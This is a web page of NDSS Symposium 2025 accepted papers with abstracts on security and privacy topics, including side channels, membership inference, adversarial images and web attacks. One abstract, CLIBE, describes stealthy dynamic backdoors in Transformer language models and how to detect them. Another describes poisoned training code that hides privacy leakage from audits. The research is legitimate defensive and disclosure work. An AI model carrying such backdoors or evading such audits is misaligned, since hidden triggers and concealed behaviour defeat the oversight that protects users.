NDSS Symposium 2025 Accepted Papers - NDSS Symposium

NDSS Symposium 2025 Accepted Papers

The following papers from the summer cycle are currently accepted for NDSS Symposium 2025.

Summer Cycle

A Key-Driven Framework for Identity-Preserving Face Anonymization
Miaomiao Wang (School of Communication and Information Engineering, Shanghai University, China); Guang Hua (Infocomm Technology Cluster, Singapore Institute of Technology, Singapore); Sheng Li (School of Computer Science, Fudan University, China); Guorui Feng (School of Communication and Information Engineering, Shanghai University, China)

Abstract: Virtual faces are crucial content in the metaverse. Recently, attempts have been made to generate virtual faces for privacy protection. Nevertheless, these virtual faces either permanently remove the identifiable information or map the original identity into a virtual one, which loses the original identity forever. In this study, we first attempt to address the conflict between privacy and identifiability in virtual faces, where a key-driven face anonymization and authentication recognition (KFAAR) framework is proposed. Concretely, the KFAAR framework consists of a head posture-preserving virtual face generation (HPVFG) module and a key-controllable virtual face authentication (KVFA) module. The HPVFG module uses a user key to project the latent vector of the original face into a virtual one. Then it maps the virtual vectors to obtain an extended encoding, based on which the virtual face is generated. By simultaneously adding a head posture and facial expression correction module, the virtual face has the same head posture and facial expression as the original face. During the authentication, we propose a KVFA module to directly recognize the virtual faces using the correct user key, which can obtain the original identity without exposing the original face image. We also propose a multi-task learning objective to train HPVFG and KVFA. Extensive experiments demonstrate the advantages of the proposed HPVFG and KVFA modules, which effectively achieve both facial anonymity and identifiability.

Topics: Security and privacy of systems based on machine learning, federated learning, AI, and large language models and Usable security and privacy


A Method to Facilitate Membership Inference Attacks in Deep Learning Models
Zitao Chen, Karthik Pattabiraman (University of British Columbia)

Abstract: Modern machine learning (ML) ecosystems offer a surging number of ML frameworks and code repositories that can greatly facilitate the development of ML models. Today, even ordinary data holders who are not ML experts can apply off-the-shelf codebase to build high-performance ML models on their data, many of which are sensitive in nature (e.g., clinical records).

In this work, we consider a malicious ML provider who supplies model-training code to the data holders, does not have access to the training process, and has only black-box query access to the resulting model. In this setting, we demonstrate a new form of membership inference attack that is strictly more powerful than prior art. Our attack empowers the adversary to reliably de-identify all the training samples (average >99% attack [email protected]% FPR), and the compromised models still maintain competitive performance as their uncorrupted counterparts (average <1% accuracy drop). Moreover, we show that the poisoned models can effectively disguise the amplified membership leakage under common membership privacy auditing, which can only be revealed by a set of secret samples known by the adversary.

Overall, our study not only points to the worst-case membership privacy leakage, but also unveils a common pitfall underlying existing privacy auditing methods, which calls for future efforts to rethink the current practice of auditing membership privacy in machine learning models.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


A Systematic Evaluation of Novel and Existing Cache Side Channels
Fabian Rauscher, Carina Fiedler, Andreas Kogler, Daniel Gruss (Graz University of Technology)

Abstract: CPU caches are among the most widely studied side-channel targets, with Prime+Probe and Flush+Reload being the most prominent techniques. These generic cache attack techniques can leak cryptographic keys, user input, and are a building block of many microarchitectural attacks.

In this paper, we present the first systematic evaluation using 9 characteristics of the 4 most relevant cache attacks, Flush+Reload, Flush+Flush, Evict+Reload, and Prime+Probe, as well as three new attacks that we introduce: Demote+Reload, Demote+Demote, and DemoteContention. We evaluate hit-miss margins, temporal precision, spatial precision, topological scope, attack time, blind spot length, channel capacity, noise resilience, and detectability on recent Intel microarchitectures. Demote+Reload and Demote+Demote perform similar to previous attacks and slightly better in some cases, e.g., Demote+Reload has a 60.7 % smaller blind spot than Flush+Reload. With 15.48 Mbit/s, Demote+Reload has a 64.3 % higher channel capacity than Flush+Reload. We also compare all attacks in an AES T-table attack and compare Demote+Reload and Flush+Reload in an inter-keystroke timing attack. Beyond the scope of the prior attack techniques, we demonstrate a KASLR break with Demote+Demote and the amplification of power side-channel leakage with Demote+Reload. Finally, Sapphire Rapids and Emerald Rapids CPUs use a non-inclusive L3 cache, effectively limiting eviction-based cross-core attacks, e.g., Prime+Probe and Evict+Reload, to rare cases where the victim’s activity reaches the L3 cache. Hence, we show that in a cross-core attack, DemoteContention can be used as a reliable alternative to Prime+Probe and Evict+Reload that does not require reverse-engineering of addressing functions and cache replacement policy.

Topics: Security for cloud/edge computing and Trustworthy computing software and hardware to secure networks and systems


AlphaDog: No-Box Camouflage Attacks via Alpha Channel Oversight
Qi Xia, Qian Chen (University of Texas at San Antonio)

Abstract: Traditional black-box adversarial attacks on computer vision models face significant limitations, including intensive querying requirements, time-consuming iterative processes, a lack of universality, and low attack success rates (ASR) and confidence levels (CL) due to subtle perturbations. This paper introduces AlphaDog, an Alpha channel attack, the first universally efficient targeted no-box attack, exploiting the often overlooked Alpha channel in RGBA images to create visual disparities between human perception and machine interpretation, efficiently deceiving both. Specifically, AlphaDog maliciously sets the RGB channels to represent the desired object for AI recognition, while crafting the Alpha channel to create a different perception for humans when blended with a standard or default background color of digital media (thumbnail or image viewer apps). Leveraging differences in how AI models and human vision process transparency, AlphaDog outperforms existing adversarial attacks in four key ways: (i) as a no-box attack, it requires zero queries; (ii) it achieves highly efficient generation, taking milliseconds to produce arbitrary attack images; (iii) AlphaDog can be universally applied, compromising most AI models with a single attack image; (iv) it guarantees 100% ASR and CL. The assessment of 6,500 AlphaDog attack examples across 100 state-of-the-art image recognition systems demonstrates AlphaDog’s effectiveness, and an IRB-approved experiment involving 20 college-age participants validates AlphaDog’s stealthiness. AlphaDog can be applied in data poisoning, evasion attacks, and content moderation. Additionally, a novel pixel-intensity histogram-based detection method is introduced to identify AlphaDog, achieving 100% effectiveness in detecting and protecting computer vision models against AlphaDog. Demos are available on the AlphaDog website.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


An Empirical Study on Fingerprint API Misuse with Lifecycle Analysis in Real-world Android Apps
Xin Zhang, Xiaohan Zhang, Zhichen Liu, Bo Zhao, Zhemin Yang, Min Yang (Fudan University)

Abstract: Fingerprint-based authentication (FpAuth) is increasingly utilized by Android apps, particularly in highly sensitive scenarios such as account login and payment, as it can provide a convenient method for verifying user identity. However, the correct and secure use of Android fingerprint APIs (FpAPIs) in real-world mobile apps remains a challenge due to their complex and evolving nature.

This paper presents the first systematic empirical analysis of FpAPI misuses in Android apps from the perspective of the FpAuth lifecycle. First, we develop specialized tools to identify and analyze apps employing FpAPIs, examining their characteristics. Then we define the threat models and categorize four prevalent types of FpAPI misuses through a detailed lifecycle analysis in practical settings. Finally, we develop tools to automatically detect these misuse types in 1,333 apps that use FpAuth and find alarming results: 97.15% of them are vulnerable to at least one type of misuse, with 18.83% susceptible to all identified misuse types. The consequences of such misuses are significant, including unauthorized data access, account compromise, and even financial loss, impacting a broad user base. We have responsibly reported these vulnerabilities, resulting in the issuance of 184 CVE IDs and 19 China National Vulnerability Database (CNVD) IDs, as well as acknowledgment from 15 vendors. We hope this work can raise awareness and emphasize the importance of proper usage of FpAPIs.

Topic: Security and privacy of mobile/smartphone platforms and their operating systems


Automated Expansion of Privacy Data Taxonomy for Compliant Data Breach Notification
Yue Qin (Indiana University Bloomington & Central University of Finance and Economics); Yue Xiao (Indiana University Bloomington & IBM Research); Xiaojing Liao (Indiana University Bloomington)

Abstract: In privacy compliance research, a significant challenge lies in comparing specific data items in actual data usage practices with the privacy data defined in laws, regulations, or policies. This task is complex due to the diversity of data items used by various applications, as well as the different interpretations of privacy data across jurisdictions. To address this challenge, privacy data taxonomies have been constructed to capture relationships between privacy data types and granularity levels, facilitating privacy compliance analysis. However, existing taxonomy construction approaches are limited by manual efforts or heuristic rules, hindering their ability to incorporate new terms from diverse domains. In this paper, we present the design of GRASP, a scalable and efficient methodology for automatically constructing and expanding privacy data taxonomies. GRASP incorporates a novel hypernym prediction model based on granularity-aware semantic projection, which outperforms existing state-of-the-art hypernym prediction methods. Additionally, we design and implement Tracy, a privacy professional assistant to recognize and interpret private data in incident reports for GDPR-compliant data breach notification. We evaluate Tracy in a usability study with 15 privacy professionals, yielding high-level usability and satisfaction.

Topics: Security and privacy of systems based on machine learning, federated learning, AI, and large language models and Special problems and case studies: e.g., tradeoffs between security and efficiency, usability, cost, and ethics


Be Careful of What You Embed: Demystifying OLE Vulnerabilities
Yunpeng Tian, Feng Dong, Haoyi Liu (Huazhong University of Science and Technology); Meng Xu (University of Waterloo); Zhiniang Peng (Huazhong University of Science and Technology and Sangfor Technologies Inc.); Zesen Ye (Sangfor Technologies Inc.); Shenghui Li (Huazhong University of Science and Technology); Xiapu Luo (The Hong Kong Polytechnic University); Haoyu Wang (Huazhong University of Science and Technology)

Abstract: Microsoft Office is a comprehensive suite of productivity tools and Object Linking & Embedding (OLE) is a specification that standardizes the linking and embedding of a diverse set of objects across different applications.OLE facilitates data interchange and streamlines user experience when dealing with composite documents (e.g., an embedded Excel sheet in a Word document). However, inherent security weaknesses within the design of OLE present risks, as the design of OLE inherently blurs the trust boundary between first-party and third-party code, which may lead to unintended library loading and parsing vulnerabilities which could be exploited by malicious actors. Addressing this issue, this paper introduces OLExplore, a novel tool designed for security assessment of Office OLE objects.With an in-depth examination of historical OLE vulnerabilities, we have identified three key categories of vulnerabilities and subjected them to dynamic analysis and verification. Our evaluation of various Windows operating system versions has led to the discovery of 26 confirmed vulnerabilities, with 17 assigned CVE numbers that all have remote code execution potential.

Topic: Software/firmware/hardware security analysis, customization, and extensions


Black-box Membership Inference Attacks against Fine-tuned Diffusion Models
Yan Pang, Tianhao Wang (University of Virginia)

Abstract: With the rapid advancement of diffusion-based image-generative models, the quality of generated images has become increasingly photorealistic. Moreover, with the release of high-quality pre-trained image-generative models, a growing number of users are downloading these pre-trained models to fine-tune them with downstream datasets for various image-generation tasks. However, employing such powerful pre-trained models in downstream tasks presents significant privacy leakage risks. In this paper, we propose the first scores-based membership inference attack framework tailored for recent diffusion models, and in the more stringent black-box access setting. Considering four distinct attack scenarios and three types of attacks, this framework is capable of targeting any popular conditional generator model, achieving high precision, evidenced by an impressive AUC of $0.95$.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


BULKHEAD: Secure, Scalable, and Efficient Kernel Compartmentalization with PKS
Yinggang Guo (State Key Laboratory for Novel Software Technology, Nanjing University; University of Minnesota); Zicheng Wang (State Key Laboratory for Novel Software Technology, Nanjing University); Weiheng Bai (University of Minnesota); Qingkai Zeng (State Key Laboratory for Novel Software Technology, Nanjing University); Kangjie Lu (University of Minnesota)

Abstract: The endless stream of vulnerabilities urgently calls for principled mitigation to confine the effect of exploitation. However, the monolithic architecture of commodity OS kernels, like the Linux kernel, allows an attacker to compromise the entire system by exploiting a vulnerability in any kernel component. Kernel compartmentalization is a promising approach that follows the least-privilege principle. However, existing mechanisms struggle with the trade-off on security, scalability, and performance, given the challenges stemming from mutual untrustworthiness among numerous and complex components.

In this paper, we present BULKHEAD, a secure, scalable, and efficient kernel compartmentalization technique that offers bi-directional isolation for unlimited compartments. It leverages Intel’s new hardware feature PKS to isolate data and code into mutually untrusted compartments and benefits from its fast compartment switching. With untrust in mind, BULKHEAD introduces a lightweight in-kernel monitor that enforces multiple important security invariants, including data integrity, execute-only memory, and compartment interface integrity. In addition, it provides a locality-aware two-level scheme that scales to unlimited compartments. We implement a prototype system on Linux v6.1 to compartmentalize loadable kernel modules (LKMs). Extensive evaluation confirms the effectiveness of our approach. As the system-wide impacts, BULKHEAD incurs an average performance overhead of 2.44% for real-world applications with 160 compartmentalized LKMs. While focusing on a specific compartment, ApacheBench tests on ipv6 show an overhead of less than 2%. Moreover, the performance is almost unaffected by the number of compartments, which makes it highly scalable.

Topics: Software/firmware/hardware security analysis, customization, and extensions and Trustworthy computing software and hardware to secure networks and systems


BumbleBee: Secure Two-party Inference Framework for Large Transformers
Wen-jie Lu, Zhicong Huang (Ant Group); Zhen Gu (Alibaba Group); Jingyu Li (Ant Group and The State Key Laboratory of Blockchain and Data Security, Zhejiang University); Jian Liu (The State Key Laboratory of Blockchain and Data Security, Zhejiang University); Cheng Hong (Ant Group); Kui Ren (The State Key Laboratory of Blockchain and Data Security, Zhejiang University); Tao Wei, WenGuang Chen (Ant Group)

Abstract: Large transformer-based models have realized state-of-the-art performance on lots of real-world tasks such as natural language processing and computer vision. However, with the increasing sensitivity of the data and tasks they handle, privacy has become a major concern during model deployment. In this work, we focus on private inference in two-party settings, where one party holds private inputs and the other holds the model. We introduce BumbleBee, a fast and communication-friendly two-party private transformer inference system. Our contributions are three-fold: First, we propose optimized protocols for matrix multiplication, which significantly reduce communication costs by 80% — 90% compared to previous techniques. Secondly, we develop a methodology for constructing efficient protocols tailored to the non-linear activation functions employed in transformer models. The proposed activation protocols have realized a significant enhancement in processing speed, alongside a remarkable reduction in communication costs by 80% — 95% compared with two prior methods. Lastly, we have performed extensive benchmarks on five transformer models. BumbleBee demonstrates its capability by evaluating the LLaMA-7B model, generating one token in approximately 8 minutes using CPUs. Our results further reveal that BumbleBee outperforms Iron (NeurIPS22) by over an order of magnitude and is three times faster than BOLT (Oakland24) with one-tenth communication.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large, language models


Careful About What App Promotion Ads Recommend! Detecting and Explaining Malware Promotion via App Promotion Graph
Shang Ma, Chaoran Chen (University of Notre Dame); Shao Yang (Case Western Reserve University); Shifu Hou, Toby Jia-Jun Li (University of Notre Dame); Xusheng Xiao (Arizona State University); Tao Xie (Peking University); Yanfang (Fanny) Ye (University of Notre Dame)

Abstract: In Android apps, their developers frequently place app promotion ads, namely advertisements to promote other apps. Unfortunately, the inadequate vetting of ad content allows malicious developers to exploit app promotion ads as a new distribution channel for malware.

To help detect malware distributed via app promotion ads, in this paper, we propose a novel approach, named ADGPE, that synergistically integrates app user interface (UI) exploration with graph learning to automatically collect app promotion ads, detect malware promoted by these ads, and explain the promotion mechanisms employed by the detected malware.

Our evaluation on 18, 627 app promotion ads demonstrates the substantial risks in the app promotion ecosystem. The probability for encountering malware when downloading from app promotion ads is hundreds of times higher than from the Google Play. Popular ad networks such as Google AdMob, Unity Ads, and Applovin are exploited by malicious developers to spread a variety of malware: aggressive adware, rogue security software, trojan, and fleeceware. Our UI exploration technique can find 24% more app promotion ads within the same time compared to the state-of-the-art techniques. We also demonstrate our technique’s usage in investigating underground economy by collecting app promotion ads in the wild. Leveraging the found app promotion relations, our malware detection model achieves a 5.17% gain in F1 score, improving the F1 score of state-of-art techniques from 90.14% to 95.31%. Our malware detection model also detects 28 apps that were initially labeled as benign apps by VirusTotal but labeled by it as malware/potentially unwanted apps (PUAs) six months later. Our path inference model unveils two malware promotion mechanisms: custom-made ad-based promotion via hardcoded ads and ad library-based promotion via interactions with ad servers (e.g., AdMob and Applovin). These findings uncover the critical security risks of app promotion ads and demonstrate the effectiveness of ADGPE in combining dynamic program analysis with graph learning to study the app promotion ad-based malware distribution.

Topic: Anti-malware techniques: detection, analysis, and prevention


Cascading Spy Sheets: Exploiting the Complexity of Modern CSS for Email and Browser Fingerprinting
Leon Trampert, Daniel Weber, Lukas Gerlach, Christian Rossow, Michael Schwarz (CISPA Helmholtz Center for Information Security)

Abstract: In an attempt to combat user tracking, both privacy-aware browsers (e.g., Tor) and email applications usually disable JavaScript. This effectively closes a major angle for user fingerprinting. However, recent findings hint at the potential for privacy leakage through selected Cascading Style Sheets (CSS) features. Nevertheless, the full fingerprinting potential of CSS remains unknown, and it is unclear if attacks apply to more restrictive settings such as email.

In this paper, we systematically investigate the modern dynamic features of CSS and their applicability for script-less fingerprinting, bypassing many state-of-the-art mitigations. We present three innovative techniques based on fuzzing and templating that exploit nuances in CSS container queries, arithmetic functions, and complex selectors. This allows us to infer detailed application, OS, and hardware configurations at high accuracy. For browsers, we can distinguish 97.95% of 1176 tested browser-OS combinations. Our methods also apply to email applications – as shown for 8 out of 21 tested web, desktop or mobile email applications. This demonstrates that fingerprinting is possible in the highly restrictive setting of HTML emails and expands the scope of tracking beyond traditional web environments.

In response to these and potential future CSS-based tracking capabilities, we propose two defense mechanisms that eliminate the root causes of privacy leakage. For browsers, we propose to preload conditional resources, which eliminates feature-dependent leakage. For the email setting, we design an email proxy service that retains privacy and email integrity while largely preserving feature compatibility. Our work provides new insights and solutions to the ongoing privacy debate, highlighting the importance of robust defenses against emerging tracking methods.

Topic: Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy


CENSOR: Defense Against Gradient Inversion via Orthogonal Subspace Bayesian Sampling
Kaiyuan Zhang, Siyuan Cheng, Guangyu Shen, Bruno Ribeiro, Shengwei An (Purdue University); Pin-Yu Chen (IBM Research); Xiangyu Zhang, Ninghui Li (Purdue University)

Abstract: Federated learning collaboratively trains a neural network on a global server, where each local client receives the current global model weights and sends back parameter updates (gradients) based on its local private data. The process of sending these model updates may leak client’s private data information. Existing gradient inversion attacks can exploit this vulnerability to recover private training instances from a client’s gradient vectors. Recently, researchers have proposed advanced gradient inversion techniques that existing defenses struggle to handle effectively. In this work, we present a novel defense tailored for large neural network models. Our defense capitalizes on the high dimensionality of the model parameters to perturb gradients within a \textit{subspace orthogonal} to the original gradient. By leveraging cold posteriors over orthogonal subspaces, our defense implements a refined gradient update mechanism. This enables the selection of an optimal gradient that not only safeguards against gradient inversion attacks but also maintains model utility. We conduct comprehensive experiments across three different datasets and evaluate our defense against various state-of-the-art attacks and defenses.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


CHAOS: Exploiting Station Time Synchronization in 802.11 Networks
Sirus Shahini, Robert Ricci (University of Utah)

Abstract: Many locations, especially in urban areas, are quite noisy with WiFi traffic. In addition to data traffic, WiFi stations send management and control frames that can easily exceed several hundred frames per second just in one small area. These WiFi environments present the opportunity to transmit data through hiding it within the noise components that can be normal parts of benign transmissions. In this paper, we show how one particular feature of WiFi, the Timing Synchronization Function (TSF), can be exploited to create a fertile and robust channel for embedding secret signals. We take advantage of the fact that there is always some degree of imprecision reflected in time synchronization of WiFi stations.

We present CHAOS, a new covert channel strategy to embed data bits in WiFi beacon frames using unmodified standard WiFi hardware. CHAOS makes use of the noise properties inherent in WiFi in two ways: First, it encodes information in the ordering of beacon frames, taking advantage of the fact that there is no natural or required ordering of beacons. Second, it makes use of a timing channel in the form of the TSF timestamp in management headers, imitating the natural imprecision of timing in real base stations to encode data in a way that is statistically similar to unmodified frames. CHAOS’s parameters can be adjusted to configure data rate, the covert channel stability and frame miss rate; using our suggested settings, it is able to robustly broadcast secret data at 520 bits/s. We also show that TSF has substantial potential for further exploitation, sketching a correlation attack that uses it to map clients to base stations.

Topics: Mobile and wireless network security and Network security policy implementation, deployment, and management


CLIBE: Detecting Dynamic Backdoors in Transformer-based NLP Models
Rui Zeng, Xi Chen, Yuwen Pu, Xuhong Zhang, Tianyu Du, Shouling Ji (Zhejiang University)

Abstract: Backdoors can be injected into NLP models to induce misbehavior when the input text contains a specific feature, known as a trigger, which the attacker secretly selects. Unlike fixed tokens, words, phrases, or sentences used in the \textit{static} text trigger, \textit{dynamic} backdoor attacks on NLP models design triggers associated with abstract and latent text features (e.g., style), making them considerably stealthier than traditional static backdoor attacks. However, existing research on NLP backdoor detection primarily focuses on defending against static backdoor attacks, while research on detecting dynamic backdoors in NLP models remains largely unexplored.

This paper presents CLIBE, the first framework to detect dynamic backdoors in Transformer-based NLP models. At a high level, CLIBE injects a \textit{“few-shot perturbation”} into the suspect Transformer model by crafting an optimized weight perturbation in the attention layers to make the perturbed model classify a limited number of reference samples as a target label. Subsequently, CLIBE leverages the \textit{generalization} capability of this “few-shot perturbation” to determine whether the original suspect model contains a dynamic backdoor. Extensive evaluation on three advanced NLP dynamic backdoor attacks, two widely-used Transformer frameworks, and four real-world classification tasks strongly validates the effectiveness and generality of CLIBE. We also demonstrate the robustness of CLIBE against various adaptive attacks. Furthermore, we employ CLIBE to scrutinize 49 popular Transformer models on Hugging Face and discover one model exhibiting a high probability of containing a dynamic backdoor. We have contacted Hugging Face and provided detailed evidence of the backdoor behavior of this model. Moreover, we show that CLIBE can be easily extended to detect backdoor text generation models (e.g., GPT-Neo-1.3B) that are modified to exhibit toxic behavior. To the best of our knowledge, CLIBE is the first framework capable of detecting backdoors in text generation models without requiring access to trigger input test samples. The code is available at https://github.com/Raytsang123/CLIBE.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Compiled Models, Built-In Exploits: Uncovering Pervasive Bit-Flip Attack Surfaces in DNN Executables
Yanzuo Chen, Zhibo Liu, Yuanyuan Yuan (The Hong Kong University of Science and Technology); Sihang Hu, Tianxiang Li (Huawei Technologies); Shuai Wang (The Hong Kong University of Science and Technology)

Abstract: Recent research has shown that bit-flip attacks (BFAs) can manipulate deep neural networks (DNNs) via DRAM Rowhammer exploitations. For high-level DNN models running on deep learning (DL) frameworks like PyTorch, extensive BFAs have been conducted to flip bits in model weights and shown effective. Defenses have also been proposed to guard model weights. Nevertheless, DNNs are increasingly compiled into DNN executables by DL compilers to leverage hardware primitives. These executables manifest new and distinct computation paradigms; we find existing research failing to accurately capture and expose the attack surface of BFAs on DNN executables.

To this end, we launch the first systematic study of BFAs on DNN executables and reveal new attack surfaces neglected or underestimated in previous work. Specifically, prior BFAs in DL frameworks are limited to attacking model weights and assume a strong whitebox attacker with full knowledge of victim model weights, which is unrealistic as weights are often confidential. In contrast, we find that BFAs on DNN executables can achieve high effectiveness by exploiting the model structure (usually stored in the executable code), which only requires knowing the (often public) model structure. Importantly, such structure-based BFAs are pervasive, transferable, and more severe (e.g., single-bit flips lead to successful attacks) in DNN executables; they also slip past existing defenses.

To realistically demonstrate the new attack surfaces, we assume a weak and more realistic attacker with no knowledge of victim model weights. We design an automated tool to identify vulnerable bits in victim executables with high confidence (70% compared to the baseline 2%). Launching this tool on DDR4 DRAM, we show that only 1.4 flips on average are needed to fully downgrade the accuracy of victim executables, including quantized models which could require 23√ó more flips previously, to random guesses. We comprehensively evaluate 16 DNN executables, covering three large-scale DNN models trained on three commonly-used datasets compiled by the two most popular DL compilers. Our finding calls for incorporating security mechanisms in future DNN compilation toolchains.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Cross-Origin Web Attacks via HTTP/2 Server Push and Signed HTTP Exchange
Pinji Chen (Tsinghua University); Jianjun Chen (Tsinghua University and Zhongguancun Laboratory); Mingming Zhang (Zhongguancun Laboratory); Qi Wang, Yiming Zhang, Mingwei Xu, Haixin Duan (Tsinghua University)

Abstract: In this paper, we investigate the security implications of HTTP/2 server push and signed HTTP exchange (SXG) on the Same-Origin Policy (SOP), a fundamental web security mechanism designed to prevent cross-origin attacks. We identify a vulnerability introduced by these features, where the traditional strict SOP origin based on URI is undermined by a more permissive HTTP/2 authority based on the SubjectAlternativeName (SAN) list in the TLS certificate. This relaxation of origin constraints, coupled with the prevalent use of shared certificates among unrelated domains, poses significant security risks, allowing attackers to bypass SOP protections. We introduce two novel attack vectors, CrossPUSH and CrossSXG, which enable an off-path attacker to execute a wide range of cross-origin web attacks, including arbitrary cross-site scripting (XSS), cookie manipulation, and malicious file downloads, across all domains listed in a shared certificate. Our investigation reveals the practicality and prevalence of these threats, with our measurements uncovering vulnerabilities in widely-used web browsers such as Chrome and Edge, and notable websites including Microsoft. We responsibly disclose our findings to affected vendors and receive acknowledgments from Huawei, Baidu, Microsoft, etc.

Topic: Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy


Delay-allowed Differentially Private Data Stream Release
Xiaochen Li (University of Virginia); Zhan Qin, Kui Ren (Zhejiang University); Chen Gong (University of Virginia); Shuya Feng, Yuan Hong (University of Connecticut); Tianhao Wang (University of Virginia)

Abstract: The research on tasks involving differentially private data stream releases has traditionally centered around real-time scenarios. However, not all data streams inherently demand real-time releases, and achieving such releases is challenging due to network latency and processing constraints in practical settings. We delve into the advantages of introducing a delay time in stream releases. Concentrating on the event-level privacy setting, we discover that incorporating a delay can overcome limitations faced by current approaches, thereby unlocking substantial potential for improving accuracy.

Building on these insights, we developed a framework for data stream releases that allows for delays. Capitalizing on data similarity and relative order characteristics, we devised two optimization strategies, group-based and order-based optimizations, to aid in reducing the added noise and post-processing of noisy data. Additionally, we introduce a novel sensitivity truncation mechanism, significantly further reducing the amount of introduced noise. Our comprehensive experimental results demonstrate that, on a data stream of length $18,319$, allowing a delay of $10$ timestamps enables the proposed approaches to achieve a remarkable up to a $30\times$ improvement in accuracy compared to baseline methods. Our code is open-sourced.

Topic: Privacy and anonymity in networks and distributed systems


Diffence: Fencing Membership Privacy With Diffusion Models
Yuefeng Peng, Ali Naseh, Amir Houmansadr (UMass Amherst)

Abstract: Deep learning models, while achieving remarkable performances across various tasks, are vulnerable to membership inference attacks (MIAs), wherein adversaries identify if a specific data point was part of the model’s training set. This susceptibility raises substantial privacy concerns, especially when models are trained on sensitive datasets. Although various defenses have been proposed, there is still substantial room for improvement in the privacy-utility trade-off. In this work, we introduce a novel defense framework against MIAs by leveraging generative models. The key intuition of our defense is to *remove the differences between member and non-member inputs*, which is exploited by MIAs, by re-generating input samples before feeding them to the target model. Therefore, our defense, called Diffence, works *pre inference*, which is unlike prior defenses that are either training-time (modify the model) or post-inference time (modify the model’s output).

A unique feature of Diffence is that it works on input samples only, without modifying the training or inference phase of the target model. Therefore, it can be *cascaded with other defense mechanisms* as we demonstrate through experiments. Diffence is specifically designed to preserve the model’s prediction labels for each sample, thereby not affecting accuracy. Furthermore, we have empirically demonstrated that it does not reduce the usefulness of the confidence vectors. Through extensive experimentation, we show that Diffence can serve as a robust plug-n-play defense mechanism, enhancing membership privacy without compromising model utility—both in terms of accuracy and the usefulness of confidence vectors—across standard and defended settings. For instance, Diffence reduces MIA attack accuracy against an undefended model by 15.8% and attack AUC by 14.0% on average across three datasets, all without impacting model utility. By integrating Diffence with prior defenses, we can achieve new state-of-the-art performances in the privacy-utility trade-off. For example, when combined with the state-of-the-art SELENA defense it reduces attack accuracy by 9.3%, and attack AUC by 10.0%. Diffence achieves this by imposing a negligible computation overhead, adding only 57ms to the inference time per sample processed on average.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Dissecting Payload-based Transaction Phishing on Ethereum
Zhuo Chen, Yufeng Hu, Bowen He, Dong Luo, Lei Wu, Yajin Zhou (Zhejiang University)

Abstract: In recent years, a more advanced form of phishing has arisen on Ethereum, surpassing early-stage, simple transaction phishing. This new form, which we refer to as payload-based transaction phishing (PTXPHISH), manipulates smart contract interactions through the execution of malicious payloads to deceive users. PTXPHISH has rapidly emerged as a significant threat, leading to incidents that caused losses exceeding $70 million in 2023 reports. Despite its substantial impact, no previous studies have systematically explored PTXPHISH.

In this paper, we present the first comprehensive study of the PTXPHISH on Ethereum. Firstly, we conduct a long-term data collection and put considerable effort into establishing the first ground-truth PTXPHISH dataset, consisting of 5,000 phishing transactions. Based on the dataset, we dissect PTXPHISH, categorizing phishing tactics into four primary categories and eleven sub-categories. Secondly, we propose a rule-based multi-dimensional detection approach to identify PTXPHISH, achieving an F1-score of over 99% and processing each block in an average of 390 ms. Finally, we conduct a large-scale detection spanning 300 days and discover a total of 130,637 phishing transactions on Ethereum, resulting in losses exceeding $341.9 million. Our in-depth analysis of these phishing transactions yielded valuable and insightful findings. Scammers consume approximately 13.4 ETH daily, which accounts for 12.5% of the total Ethereum gas, to propagate address poisoning scams. Additionally, our analysis reveals patterns in the cash-out process employed by phishing scammers, and we find that the top five phishing organizations are responsible for 40.7% of all losses.

Furthermore, our work has made significant contributions to mitigating real-world threats. We have reported 1,726 phishing addresses to the community, accounting for 42.7% of total community contributions during the same period. Additionally, we have sent 2,539 on-chain alert messages, assisting 1,980 victims. This research serves as a valuable reference in combating the emerging PTXPHISH and safeguarding users’ assets.

Topics: Cyber-crime defense and forensics (e.g., anti-phishing, anti-blackmailing, anti-fraud techniques) and Security and privacy for blockchains and cryptocurrencies


Duumviri: Detecting Trackers and Mixed Trackers with a Breakage Detector
He Shuang (University of Toronto); Lianying Zhao (Carleton University); David Lie (University of Toronto)

Abstract: Web tracking harms user privacy. As a result, the use of tracker detection and blocking tools is a common practice among Internet users. However, no such tool can be perfect, and thus there is a trade-off between avoiding breakage (caused by unintentionally blocking some required functionality) and neglecting to block some trackers. State-of-the-art tools usually rely on user reports and developer effort to detect breakages, which can be broadly categorized into two causes: 1) misidentifying non-trackers as trackers, and 2) blocking mixed trackers which blend tracking with functional components.

We propose incorporating a machine learning-based breakage detector into the tracker detection pipeline to automatically avoid misidentification of functional resources. For both tracker detection and breakage detection, we propose using differential features that can more clearly elucidate the differences caused by blocking a request. We designed and implemented a prototype of our proposed approach, Duumviri, for non-mixed trackers. We then adopt it to automatically identify mixed trackers, drawing differential features at partial-request granularity.

In the case of non-mixed trackers, evaluating Duumviri on 15K pages shows its ability to replicate the labels of human-generated filter lists, EasyPrivacy, with an accuracy of 97.44%. Through a manual analysis, we find that Duumviri can identify previously unreported trackers and its breakage detector can identify overly strict EasyPrivacy rules that cause breakage. In the case of mixed trackers, Duumviri is the first automated mixed tracker detector, and achieves a lower bound accuracy of 74.19%. Duumviri has enabled us to detect and confirm 22 previously unreported unique trackers and 26 unique mixed trackers.

Topic: Privacy and anonymity in networks and distributed systems


ERW-Radar: An Adaptive Detection System against Evasive Ransomware by Contextual Behavior Detection and Fine-grained Content Analysis
Lingbo Zhao, Yuhui Zhang, Zhilu Wang, Fengkai Yuan, Rui Hou (Institute of Information Engineering, Chinese Academy of Sciences)

